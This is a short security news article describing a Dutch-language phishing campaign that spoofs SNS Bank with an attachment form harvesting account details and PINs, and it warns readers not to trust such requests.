14 DAY TRIAL // The Dutch financial institution is realistically impersonated in the latest spam campaign that's been seen in the wild, joining the club of phishing expeditions that rely on attachments to do their thing.
It's not the first time we see a legitimate website being replicated in detail, as recently, PayPal also seemed to be sending out emails that announced unsuccessful transactions.
Mxlabs shows us the message that seems to be coming from the spoofed location SNS Bank <[email protected]>, announcing the unsuspecting victim that his bank account needs to be verified as soon as possible.
The attachment, called SNS_RekeningActiveren, opens a form in the user's browser that requires him to complete a number of textfields that contain all sorts of sensitive information, including PIN number.
After the Submit button is hit, the data is sent to a Canadian domain which most likely is controlled by the masterminds behind the operation.
As the content of the email and the form is entirely in Dutch, the spam campaign most likely targets people from the Netherlands, but this is a very good example of phishing attempts that are carefully designed to be taken seriously. In the images contained in the article you can very well see the almost perfect resemblance.
Cybercriminals noticed the fact that emails written in a hurry, with a lot of grammar errors and filled with incorrect information mostly fail, so they turn to these more sophisticated attempts which were developed over a longer time period.
The conclusion we can draw from this is that even if it looks highly legit, a bank still won't ask anyone for sensitive information over the phone or over the internet, especially when it comes to things like PIN and account numbers.
In these situations, the attachment might not be detected as malware by your anti-virus solution so it will be up to your logical thinking to determine that the note isn't legitimate.
